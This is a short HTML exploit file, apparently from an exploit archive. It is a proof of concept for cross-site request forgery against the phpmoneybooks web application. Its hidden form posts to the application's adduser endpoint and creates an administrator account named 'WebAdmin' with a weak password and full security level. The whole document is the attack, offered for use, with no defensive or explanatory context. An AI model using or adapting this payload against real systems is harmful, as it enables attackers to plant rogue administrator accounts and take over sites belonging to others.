Exploit:
<html>
<head>
<title>phpmoneybooks [Add Admin]</title>
</head>
<body>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/index.php?module=users&action=adduser">
<input type="hidden" name="RealName" value="WebAdmin"/>
<input type="hidden" name="UserName" value="WebAdmin"/>
<input type="hidden" name="AcctPass" value="123456"/>
<input type="hidden" name="AcctEmail" value="honker90@vip.qq.com"/>
<input type="hidden" name="AcctSecurity" value="10"/>
<input type="hidden" name="CustSecurity" value=""/>
</form>
</body>
</html>